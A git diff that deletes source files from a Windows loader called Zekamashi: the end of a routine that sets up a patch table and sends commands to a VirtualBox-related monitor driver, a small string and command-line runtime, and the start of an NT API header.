- // - if (l < 6) { - cuiPrintText(TEXT("Ldr: This operation system version is not supported"), TRUE); - break; - } - - uCmd = TSUGUMI_IOCTL_REFRESH_LIST; - - // Parse command line. - RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); - GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &l); - if (l > 0) { - - if (_strcmpi(szBuffer, TEXT("/?")) == 0) { - cuiPrintText(T_HELP, TRUE); - InterlockedDecrement((PLONG)&g_lApplicationInstances); - ExitProcess(0); - break; - } - - //check stop flag, if not set check second param - if (_strcmpi(szBuffer, TEXT("/s")) == 0) { - uCmd = TSUGUMI_IOCTL_MONITOR_STOP; - SendCommand(uCmd, TEXT("TSUGUMI_IOCTL_MONITOR_STOP")); - break; - } - else { - l = 0; - DataBufferDD = FetchCustomPatchData(szBuffer, &l); - if ((DataBufferDD != NULL) && (l > 0)) { - g_PatchData.DDTablePointer = DataBufferDD; - g_PatchData.DDTableSize = l; - bFound = TRUE; - } - else { - cuiPrintText(TEXT("Ldr: Error reading file at parameter 1"), TRUE); - break; - } - } - } - - // - // Check if custom patch table present. If not - attempt to create own. Exit on failure. - // - if (bFound == FALSE) { - bFound = CreatePatchTable(); - if (bFound == FALSE) { - cuiPrintText(TEXT("Ldr: Could not load patch table"), TRUE); - break; - } - else { - cuiPrintText(TEXT("Ldr: Patch table created"), TRUE); - } - } - -#ifndef _DEBUG - // - // Check if any VBox instances are running, they must be closed before our usage. - // - if (supProcessExist(L"VirtualBox.exe")) { - cuiPrintText(TEXT("Ldr: VirtualBox is running, close it before"), TRUE); - break; - } -#endif - - if (!SetTsmiParams()) { - cuiPrintText(TEXT("Ldr: Cannot write Tsugumi settings"), TRUE); - break; - } - else { - cuiPrintText(TEXT("Ldr: Tsugumi patch table parameters set"), TRUE); - } - - // - // Load signed Tsugumi.sys, otherwise we expect TDL already loaded unsigned driver. 
- // -#ifdef _SIGNED_BUILD - if (!supLoadDeviceDriver()) { - cuiPrintText(TEXT("Ldr: Failed to load Tsugumi monitor driver"), TRUE); - break; - } -#else - bTryVBoxRestart = TRUE; -#endif - //send command to driver - SendCommand(uCmd, TEXT("TSUGUMI_IOCTL_REFRESH_LIST")); - - } while (cond); - - if (bTryVBoxRestart) { - l = 0; - if (supRestartVBoxDrv(&l)) { - cuiPrintText(TEXT("Ldr: supRestartVBoxDrv success"), TRUE); - } - else { - _strcpy(szBuffer, TEXT("Ldr: supRestartVBoxDrv = 0x")); - ultohex(l, _strend(szBuffer)); - cuiPrintText(szBuffer, TRUE); - } - } - - cuiPrintText(TEXT("Ldr: exit"), TRUE); - InterlockedDecrement((PLONG)&g_lApplicationInstances); - ExitProcess(0); -} diff --git a/Source/Zekamashi/loader/minirtl/_strcat.c b/Source/Zekamashi/loader/minirtl/_strcat.c deleted file mode 100644 index eb3c136..0000000 --- a/Source/Zekamashi/loader/minirtl/_strcat.c +++ /dev/null @@ -1,37 +0,0 @@ -#include "rtltypes.h" - -char *_strcat_a(char *dest, const char *src) -{ - if ( (dest==0) || (src==0) ) - return dest; - - while ( *dest!=0 ) - dest++; - - while ( *src!=0 ) { - *dest = *src; - dest++; - src++; - } - - *dest = 0; - return dest; -} - -wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) -{ - if ( (dest==0) || (src==0) ) - return dest; - - while ( *dest!=0 ) - dest++; - - while ( *src!=0 ) { - *dest = *src; - dest++; - src++; - } - - *dest = 0; - return dest; -} diff --git a/Source/Zekamashi/loader/minirtl/_strcpy.c b/Source/Zekamashi/loader/minirtl/_strcpy.c deleted file mode 100644 index bad5c90..0000000 --- a/Source/Zekamashi/loader/minirtl/_strcpy.c +++ /dev/null 
@@ -1,43 +0,0 @@ -#include "rtltypes.h" - -char *_strcpy_a(char *dest, const char *src) -{ - char *p; - - if ( (dest==0) || (src==0) ) - return dest; - - if (dest == src) - return dest; - - p = dest; - while ( *src!=0 ) { - *p = *src; - p++; - src++; - } - - *p = 0; - return dest; -} - -wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) -{ - wchar_t *p; - - if ((dest == 0) || (src == 0)) - return dest; - - if (dest == src) - return dest; - - p = dest; - while ( *src!=0 ) { - *p = *src; - p++; - src++; - } - - *p = 0; - return dest; -} diff --git a/Source/Zekamashi/loader/minirtl/_strend.c b/Source/Zekamashi/loader/minirtl/_strend.c deleted file mode 100644 index a4d4b6a..0000000 --- a/Source/Zekamashi/loader/minirtl/_strend.c +++ /dev/null @@ -1,23 +0,0 @@ -#include "rtltypes.h" - -char *_strend_a(const char *s) -{ - if ( s==0 ) - return 0; - - while ( *s!=0 ) - s++; - - return (char *)s; -} - -wchar_t *_strend_w(const wchar_t *s) -{ - if ( s==0 ) - return 0; - - while ( *s!=0 ) - s++; - - return (wchar_t *)s; -} diff --git a/Source/Zekamashi/loader/minirtl/_strlen.c b/Source/Zekamashi/loader/minirtl/_strlen.c deleted file mode 100644 index 1feda9e..0000000 --- a/Source/Zekamashi/loader/minirtl/_strlen.c +++ /dev/null @@ -1,27 +0,0 @@ -#include "rtltypes.h" - -size_t _strlen_a(const char *s) -{ - char *s0 = (char *)s; - - if ( s==0 ) - return 0; - - while ( *s!=0 ) - s++; - - return (s-s0); -} - -size_t _strlen_w(const wchar_t *s) -{ - wchar_t *s0 = (wchar_t *)s; - - if ( s==0 ) - return 0; - - while ( *s!=0 ) - s++; - - return (s-s0); -} diff --git a/Source/Zekamashi/loader/minirtl/cmdline.c b/Source/Zekamashi/loader/minirtl/cmdline.c deleted file mode 100644 index 1a3aecb..0000000 --- a/Source/Zekamashi/loader/minirtl/cmdline.c +++ /dev/null 
@@ -1,180 +0,0 @@ -#include - -BOOL GetCommandLineParamW( - IN LPCWSTR CmdLine, - IN ULONG ParamIndex, - OUT LPWSTR Buffer, - IN ULONG BufferSize, - OUT PULONG ParamLen - ) -{ - ULONG c, plen = 0; - TCHAR divider; - - if (ParamLen != NULL) - *ParamLen = 0; - - if (CmdLine == NULL) { - if ((Buffer != NULL) && (BufferSize > 0)) - *Buffer = 0; - return FALSE; - } - - for (c = 0; c <= ParamIndex; c++) { - plen = 0; - - while (*CmdLine == ' ') - CmdLine++; - - switch (*CmdLine) { - case 0: - goto zero_term_exit; - - case '"': - CmdLine++; - divider = '"'; - break; - - default: - divider = ' '; - } - - while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) { - plen++; - if (c == ParamIndex) - if ((plen < BufferSize) && (Buffer != NULL)) { - *Buffer = *CmdLine; - Buffer++; - } - CmdLine++; - } - - if (*CmdLine != 0) - CmdLine++; - } - -zero_term_exit: - - if ((Buffer != NULL) && (BufferSize > 0)) - *Buffer = 0; - - if (ParamLen != NULL) - *ParamLen = plen; - - if (plen < BufferSize) - return TRUE; - else - return FALSE; -} - -BOOL GetCommandLineParamA( - IN LPCSTR CmdLine, - IN ULONG ParamIndex, - OUT LPSTR Buffer, - IN ULONG BufferSize, - OUT PULONG ParamLen - ) -{ - ULONG c, plen = 0; - TCHAR divider; - - if (CmdLine == NULL) - return FALSE; - - if (ParamLen != NULL) - *ParamLen = 0; - - for (c = 0; c <= ParamIndex; c++) { - plen = 0; - - while (*CmdLine == ' ') - CmdLine++; - - switch (*CmdLine) { - case 0: - goto zero_term_exit; - - case '"': - CmdLine++; - divider = '"'; - break; - - default: - divider = ' '; - } - - while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) { - plen++; - if (c == ParamIndex) - if ((plen < BufferSize) && (Buffer != NULL)) { - *Buffer = *CmdLine; - Buffer++; - } - CmdLine++; - } - - if (*CmdLine != 0) - CmdLine++; - } - -zero_term_exit: - - if ((Buffer != NULL) && (BufferSize > 0)) - *Buffer = 0; - - if (ParamLen != NULL) - *ParamLen = plen; - - if (plen < BufferSize) - return TRUE; - else - return FALSE; -} 
- -char *ExtractFilePathA(const char *FileName, char *FilePath) -{ - char *p = (char *)FileName, *p0 = (char *)FileName; - - if ((FileName == 0) || (FilePath == 0)) - return 0; - - while (*FileName != 0) { - if (*FileName == '\\') - p = (char *)FileName + 1; - FileName++; - } - - while (p0 < p) { - *FilePath = *p0; - FilePath++; - p0++; - } - - *FilePath = 0; - - return FilePath; -} - -wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath) -{ - wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName; - - if ((FileName == 0) || (FilePath == 0)) - return 0; - - while (*FileName != 0) { - if (*FileName == '\\') - p = (wchar_t *)FileName + 1; - FileName++; - } - - while (p0 < p) { - *FilePath = *p0; - FilePath++; - p0++; - } - - *FilePath = 0; - - return FilePath; -} diff --git a/Source/Zekamashi/loader/minirtl/cmdline.h b/Source/Zekamashi/loader/minirtl/cmdline.h deleted file mode 100644 index 310a4a5..0000000 --- a/Source/Zekamashi/loader/minirtl/cmdline.h +++ /dev/null @@ -1,35 +0,0 @@ -#ifndef _CMDLINEH_ -#define _CMDLINEH_ - -BOOL GetCommandLineParamW( - IN LPCWSTR CmdLine, - IN ULONG ParamIndex, - OUT LPWSTR Buffer, - IN ULONG BufferSize, - OUT PULONG ParamLen - ); - -BOOL GetCommandLineParamA( - IN LPCSTR CmdLine, - IN ULONG ParamIndex, - OUT LPSTR Buffer, - IN ULONG BufferSize, - OUT PULONG ParamLen - ); - -char *ExtractFilePathA(const char *FileName, char *FilePath); -wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); - -#ifdef UNICODE - -#define ExtractFilePath ExtractFilePathW -#define GetCommandLineParam GetCommandLineParamW - -#else // ANSI - -#define ExtractFilePath ExtractFilePathA -#define GetCommandLineParam GetCommandLineParamA - -#endif - -#endif /* _CMDLINEH_ */ diff --git a/Source/Zekamashi/loader/minirtl/minirtl.h b/Source/Zekamashi/loader/minirtl/minirtl.h deleted file mode 100644 index 17cf519..0000000 --- a/Source/Zekamashi/loader/minirtl/minirtl.h +++ /dev/null 
@@ -1,155 +0,0 @@
-/*
-Module name:
- minirtl.h
-
-Description:
- header for string handling and conversion routines
-
-Date:
- 1 Mar 2015
-*/
-
-#ifndef _MINIRTL_
-#define _MINIRTL_
-
-// string copy/concat/length
-
-char *_strend_a(const char *s);
-wchar_t *_strend_w(const wchar_t *s);
-
-char *_strcpy_a(char *dest, const char *src);
-wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);
-
-char *_strcat_a(char *dest, const char *src);
-wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);
-
-char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
-wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);
-
-size_t _strlen_a(const char *s);
-size_t _strlen_w(const wchar_t *s);
-
-// comparing
-
-int _strcmp_a(const char *s1, const char *s2);
-int _strcmp_w(const wchar_t *s1, const wchar_t *s2);
-
-int _strncmp_a(const char *s1, const char *s2, size_t cchars);
-int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
-
-int _strcmpi_a(const char *s1, const char *s2);
-int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);
-
-int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
-int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
-
-char *_strstr_a(const char *s, const char *sub_s);
-wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);
-
-char *_strstri_a(const char *s, const char *sub_s);
-wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);
-
-// conversion of integer types to string, returning string length
-
-size_t ultostr_a(unsigned long x, char *s);
-size_t ultostr_w(unsigned long x, wchar_t *s);
-
-size_t ultohex_a(unsigned long x, char *s);
-size_t ultohex_w(unsigned long x, wchar_t *s);
-
-size_t itostr_a(int x, char *s);
-size_t itostr_w(int x, wchar_t *s);
-
-size_t i64tostr_a(signed long long x, char *s);
-size_t i64tostr_w(signed long long x, wchar_t *s);
-
-size_t u64tostr_a(unsigned long long x, char *s);
-size_t u64tostr_w(unsigned long long x, wchar_t *s);
-
-size_t u64tohex_a(unsigned long long x, char *s);
-size_t u64tohex_w(unsigned long long x, wchar_t *s);
-
-// string to integers conversion
-
-unsigned long strtoul_a(char *s);
-unsigned long strtoul_w(wchar_t *s);
-
-unsigned long long strtou64_a(char *s);
-unsigned long long strtou64_w(wchar_t *s);
-
-unsigned long hextoul_a(char *s);
-unsigned long hextoul_w(wchar_t *s);
-
-int strtoi_a(char *s);
-int strtoi_w(wchar_t *s);
-
-signed long long strtoi64_a(char *s);
-signed long long strtoi64_w(wchar_t *s);
-
-unsigned long long hextou64_a(char *s);
-unsigned long long hextou64_w(wchar_t *s);
-
-/* =================================== */
-
-#ifdef UNICODE
-
-#define _strend _strend_w
-#define _strcpy _strcpy_w
-#define _strcat _strcat_w
-#define _strlen _strlen_w
-#define _strncpy _strncpy_w
-
-#define _strcmp _strcmp_w
-#define _strncmp _strncmp_w
-#define _strcmpi _strcmpi_w
-#define _strncmpi _strncmpi_w
-#define _strstr _strstr_w
-#define _strstri _strstri_w
-
-#define ultostr ultostr_w
-#define ultohex ultohex_w
-#define itostr itostr_w
-#define i64tostr i64tostr_w
-#define u64tostr u64tostr_w
-#define u64tohex u64tohex_w
-
-#define strtoul strtoul_w
-#define hextoul hextoul_w
-#define strtoi strtoi_w
-#define strtoi64 strtoi64_w
-#define strtou64 strtou64_w
-#define hextou64 hextou64_w
-
-#else // ANSI
-
-#define _strend _strend_a
-#define _strcpy _strcpy_a
-#define _strcat _strcat_a
-#define _strlen _strlen_a
-#define _strncpy _strncpy_a
-#define _strcmp _strcmp_a
-
-#define _strcmp _strcmp_a
-#define _strncmp _strncmp_a
-#define _strcmpi _strcmpi_a
-#define _strncmpi _strncmpi_a
-#define _strstr _strstr_a
-#define _strstri _strstri_a
-
-#define ultostr ultostr_a
-#define ultohex ultohex_a
-#define itostr itostr_a
-#define i64tostr i64tostr_a
-#define u64tostr u64tostr_a
-#define u64tohex u64tohex_a
-
-#define strtoul strtoul_a
-#define hextoul hextoul_a
-#define strtoi strtoi_a
-#define strtoi64 strtoi64_a
-#define strtou64 strtou64_a
-#define hextou64 hextou64_a
-
-#endif
-
-#endif /* _MINIRTL_ */
diff --git a/Source/Zekamashi/loader/minirtl/rtltypes.h b/Source/Zekamashi/loader/minirtl/rtltypes.h
deleted file mode 100644
index fbb8b2d..0000000
--- a/Source/Zekamashi/loader/minirtl/rtltypes.h
+++ /dev/null
@@ -1,43 +0,0 @@
-#ifndef _WCHAR_T_DEFINED
-typedef unsigned short wchar_t;
-#define _WCHAR_T_DEFINED
-#endif /* _WCHAR_T_DEFINED */
-
-#ifndef _SIZE_T_DEFINED
-#ifdef _WIN64
-typedef unsigned __int64 size_t;
-#else /* _WIN64 */
-typedef __w64 unsigned int size_t;
-#endif /* _WIN64 */
-#define _SIZE_T_DEFINED
-#endif /* _SIZE_T_DEFINED */
-
-__forceinline char locase_a(char c)
-{
- if ((c >= 'A') && (c <= 'Z'))
- return c + 0x20;
- else
- return c;
-}
-
-__forceinline wchar_t locase_w(wchar_t c)
-{
- if ((c >= 'A') && (c <= 'Z'))
- return c + 0x20;
- else
- return c;
-}
-
-__forceinline char byteabs(char x) {
- if (x < 0)
- return -x;
- return x;
-}
-
-__forceinline int _isdigit_a(char x) {
- return ((x >= '0') && (x <= '9'));
-}
-
-__forceinline int _isdigit_w(wchar_t x) {
- return ((x >= L'0') && (x <= L'9'));
-}
diff --git a/Source/Zekamashi/loader/minirtl/u64tohex.c b/Source/Zekamashi/loader/minirtl/u64tohex.c
deleted file mode 100644
index 1e7af7f..0000000
--- a/Source/Zekamashi/loader/minirtl/u64tohex.c
+++ /dev/null
@@ -1,49 +0,0 @@
-#include "rtltypes.h"
-
-size_t u64tohex_a(unsigned long long x, char *s)
-{
- char p;
- size_t c;
-
- if (s==0)
- return 16;
-
- for (c=0; c<16; c++) {
- p = (char)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += '0';
- else
- p = 'A' + (p-10);
-
- s[15-c] = p;
- }
-
- s[16] = 0;
- return 16;
-}
-
-size_t u64tohex_w(unsigned long long x, wchar_t *s)
-{
- wchar_t p;
- size_t c;
-
- if (s==0)
- return 16;
-
- for (c = 0; c<16; c++) {
- p = (wchar_t)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += L'0';
- else
- p = L'A' + (p-10);
-
- s[15-c] = p;
- }
-
- s[16] = 0;
- return 16;
-}
diff --git a/Source/Zekamashi/loader/minirtl/u64tostr.c b/Source/Zekamashi/loader/minirtl/u64tostr.c
deleted file mode 100644
index 24c4dba..0000000
--- a/Source/Zekamashi/loader/minirtl/u64tostr.c
+++ /dev/null
@@ -1,45 +0,0 @@
-#include "rtltypes.h"
-
-size_t u64tostr_a(unsigned long long x, char *s)
-{
- unsigned long long t = x;
- size_t i, r=1;
-
- while ( t >= 10 ) {
- t /= 10;
- r++;
- }
-
- if (s == 0)
- return r;
-
- for (i = r; i != 0; i--) {
- s[i-1] = (char)(x % 10) + '0';
- x /= 10;
- }
-
- s[r] = (char)0;
- return r;
-}
-
-size_t u64tostr_w(unsigned long long x, wchar_t *s)
-{
- unsigned long long t = x;
- size_t i, r=1;
-
- while ( t >= 10 ) {
- t /= 10;
- r++;
- }
-
- if (s == 0)
- return r;
-
- for (i = r; i != 0; i--) {
- s[i-1] = (wchar_t)(x % 10) + L'0';
- x /= 10;
- }
-
- s[r] = (wchar_t)0;
- return r;
-}
diff --git a/Source/Zekamashi/loader/minirtl/ultohex.c b/Source/Zekamashi/loader/minirtl/ultohex.c
deleted file mode 100644
index 2529c9c..0000000
--- a/Source/Zekamashi/loader/minirtl/ultohex.c
+++ /dev/null
@@ -1,49 +0,0 @@
-#include "rtltypes.h"
-
-size_t ultohex_a(unsigned long x, char *s)
-{
- char p;
- size_t c;
-
- if (s==0)
- return 8;
-
- for (c=0; c<8; c++) {
- p = (char)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += '0';
- else
- p = 'A' + (p-10);
-
- s[7-c] = p;
- }
-
- s[8] = 0;
- return 8;
-}
-
-size_t ultohex_w(unsigned long x, wchar_t *s)
-{
- wchar_t p;
- size_t c;
-
- if (s==0)
- return 8;
-
- for (c=0; c<8; c++) {
- p = (wchar_t)(x & 0xf);
- x >>= 4;
-
- if (p<10)
- p += L'0';
- else
- p = L'A' + (p-10);
-
- s[7-c] = p;
- }
-
- s[8] = 0;
- return 8;
-}
diff --git a/Source/Zekamashi/loader/ntos.h b/Source/Zekamashi/loader/ntos.h
deleted file mode 100644
index 2f1516e..0000000
--- a/Source/Zekamashi/loader/ntos.h
+++ /dev/null
@@ -1,10902 +0,0 @@
-/************************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2015 - 2018, translated from Microsoft sources/debugger
-*
-* TITLE: NTOS.H
-*
-* VERSION: 1.98
-*
-* DATE: 28 Dec 2018
-*
-* Common header file for the ntos API functions and definitions.
-*
-* Only projects required API/definitions.
-*
-* Depends on: Windows.h
-* NtStatus.h
-*
-* Include: Windows.h
-* NtStatus.h
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-************************************************************************************/
-
-#ifndef NTOS_RTL
-#define NTOS_RTL
-
-//
-// NTOS_RTL HEADER BEGIN
-//
-
-#if defined(__cplusplus)
-extern "C" {
-#endif
-
-#pragma comment(lib, "ntdll.lib")
-
-#pragma warning(push)
-#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int
-
-#ifndef PAGE_SIZE
-#define PAGE_SIZE 0x1000ull
-#endif
-
-#ifndef ABSOLUTE_TIME
-#define ABSOLUTE_TIME(wait) (wait)
-#endif
-
-#ifndef RELATIVE_TIME
-#define RELATIVE_TIME(wait) (-(wait))
-#endif
-
-#ifndef NANOSECONDS
-#define NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)
-#endif
-
-#ifndef MICROSECONDS
-#define MICROSECONDS(micros) (((signed __int64)(micros)) * NANOSECONDS(1000L))
-#endif
-
-#ifndef MILLISECONDS
-#define MILLISECONDS(milli) (((signed __int64)(milli)) * MICROSECONDS(1000L))
-#endif
-
-#ifndef SECONDS
-#define SECONDS(seconds) (((signed __int64)(seconds)) * MILLISECONDS(1000L))
-#endif
-
-#ifndef POI //poi-poi
-#define POI(addr) *(ULONG *)(addr)
-#endif
-
-typedef char CCHAR;
-typedef unsigned char UCHAR;
-typedef CCHAR KPROCESSOR_MODE;
-typedef UCHAR KIRQL;
-typedef KIRQL *PKIRQL;
-
-#ifndef IN_REGION
-#define IN_REGION(x, Base, Size) (((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && \
- ((ULONG_PTR)(x) <= (ULONG_PTR)(Base) + (ULONG_PTR)(Size)))
-#endif
-
-//
-// Define alignment macros to align structure sizes and pointers up and down.
-//
-
-#ifndef ALIGN_UP_TYPE
-#define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
-#endif
-
-#ifndef ALIGN_UP
-#define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type))
-#endif
-
-#ifndef ALIGN_DOWN_TYPE
-#define ALIGN_DOWN_TYPE(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
-#endif
-
-#ifndef ALIGN_DOWN
-#define ALIGN_DOWN(Address, Type) ALIGN_DOWN_TYPE(Address, sizeof(Type))
-#endif
-
-#ifndef ALIGN_UP_BY
-#define ALIGN_UP_BY(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
-#endif
-
-#ifndef ALIGN_DOWN_BY
-#define ALIGN_DOWN_BY(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
-#endif
-
-#ifndef ALIGN_UP_POINTER_BY
-#define ALIGN_UP_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_UP_BY(Pointer, Align))
-#endif
-
-#ifndef ALIGN_DOWN_POINTER_BY
-#define ALIGN_DOWN_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_DOWN_BY(Pointer, Align))
-#endif
-
-#ifndef ALIGN_UP_POINTER
-#define ALIGN_UP_POINTER(Pointer, Type) ((PVOID)ALIGN_UP(Pointer, Type))
-#endif
-
-#ifndef ALIGN_DOWN_POINTER
-#define ALIGN_DOWN_POINTER(Pointer, Type) ((PVOID)ALIGN_DOWN(Pointer, Type))
-#endif
-
-#ifndef ARGUMENT_PRESENT
-#define ARGUMENT_PRESENT(ArgumentPointer) (\
- (CHAR *)((ULONG_PTR)(ArgumentPointer)) != (CHAR *)(NULL) )
-#endif
-
-#ifndef LOGICAL
-#define LOGICAL ULONG
-#endif
-
-#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
-#define ZwCurrentProcess() NtCurrentProcess()
-#define NtCurrentThread() ((HANDLE)(LONG_PTR)-2)
-#define ZwCurrentThread() NtCurrentThread()
-#define NtCurrentSession() ((HANDLE)(LONG_PTR)-3)
-#define ZwCurrentSession() NtCurrentSession()
-
-//Valid Only for Windows 8+
-#define NtCurrentProcessToken() ((HANDLE)(LONG_PTR)-4)
-#define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5)
-#define NtCurrentEffectiveToken() ((HANDLE)(LONG_PTR)-6)
-
-//
-// ntdef.h begin
-//
-#ifndef RTL_CONSTANT_STRING
-char _RTL_CONSTANT_STRING_type_check(const void *s);
-#define _RTL_CONSTANT_STRING_remove_const_macro(s) (s)
-#define RTL_CONSTANT_STRING(s) \
-{ \
- sizeof( s ) - sizeof( (s)[0] ), \
- sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \
- _RTL_CONSTANT_STRING_remove_const_macro(s) \
-}
-#endif
-
-#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \
- { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }
-
-// This synonym is more appropriate for initializing what isn't actually const.
-#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)
-
-//
-// ntdef.h end
-//
-
-#define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) ))
-#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))
-
-
-typedef ULONG CLONG;
-typedef LONG KPRIORITY;
-typedef short CSHORT;
-typedef ULONGLONG REGHANDLE, *PREGHANDLE;
-typedef PVOID *PDEVICE_MAP;
-typedef PVOID PHEAD;
-
-//
-// Valid values for the OBJECT_ATTRIBUTES.Attributes field
-//
-#define OBJ_INHERIT 0x00000002L
-#define OBJ_PERMANENT 0x00000010L
-#define OBJ_EXCLUSIVE 0x00000020L
-#define OBJ_CASE_INSENSITIVE 0x00000040L
-#define OBJ_OPENIF 0x00000080L
-#define OBJ_OPENLINK 0x00000100L
-#define OBJ_KERNEL_HANDLE 0x00000200L
-#define OBJ_FORCE_ACCESS_CHECK 0x00000400L
-#define OBJ_VALID_ATTRIBUTES 0x000007F2L
-
-//
-// Callback Object Rights
-//
-#define CALLBACK_MODIFY_STATE 0x0001
-#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )
-
-//
-// Debug Object Access Rights
-//
-#define DEBUG_READ_EVENT (0x0001)
-#define DEBUG_PROCESS_ASSIGN (0x0002)
-#define DEBUG_SET_INFORMATION (0x0004)
-#define DEBUG_QUERY_INFORMATION (0x0008)
-#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\
- DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)
-
-//
-// Directory Object Access Rights
-//
-#define DIRECTORY_QUERY (0x0001)
-#define DIRECTORY_TRAVERSE (0x0002)
-#define DIRECTORY_CREATE_OBJECT (0x0004)
-#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008)
-#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
-
-//
-// Event Object Access Rights
-//
-#define EVENT_QUERY_STATE 0x0001
-#define EVENT_MODIFY_STATE 0x0002
-#define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
-
-//
-// EventPair Object Access Rights
-//
-#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)
-
-//
-// I/O Completion Object Access Rights
-//
-#define IO_COMPLETION_QUERY_STATE 0x0001
-#define IO_COMPLETION_MODIFY_STATE 0x0002
-#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
-
-//
-// KeyedEvent Object Access Rights
-//
-#define KEYEDEVENT_WAIT 0x0001
-#define KEYEDEVENT_WAKE 0x0002
-#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)
-
-//
-// Mutant Object Access Rights
-//
-#define MUTANT_QUERY_STATE 0x0001
-#ifndef MUTANT_ALL_ACCESS //SDK compatibility
-#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)
-#endif
-
-//
-// Port Object Access Rights
-//
-#define PORT_CONNECT (0x0001)
-#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | PORT_CONNECT)
-
-//
-// Profile Object Access Rights
-//
-#define PROFILE_CONTROL (0x0001)
-#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)
-
-//
-// Semaphore Object Access Rights
-//
-#define SEMAPHORE_QUERY_STATE 0x0001
-#define SEMAPHORE_MODIFY_STATE 0x0002
-#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
-
-//
-// SymbolicLink Object Access Rights
-//
-#define SYMBOLIC_LINK_QUERY (0x0001)
-#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYMBOLIC_LINK_QUERY)
-
-//
-// Thread Object Access Rights
-//
-#define THREAD_ALERT (0x0004)
-
-#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001
-#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002
-#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004
-#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010
-#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020
-#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080
-
-//
-// Worker Factory Object Access Rights
-//
-#define WORKER_FACTORY_RELEASE_WORKER 0x0001
-#define WORKER_FACTORY_WAIT 0x0002
-#define WORKER_FACTORY_SET_INFORMATION 0x0004
-#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
-#define WORKER_FACTORY_READY_WORKER 0x0010
-#define WORKER_FACTORY_SHUTDOWN 0x0020
-
-#define WORKER_FACTORY_ALL_ACCESS ( \
- STANDARD_RIGHTS_REQUIRED | \
- WORKER_FACTORY_RELEASE_WORKER | \
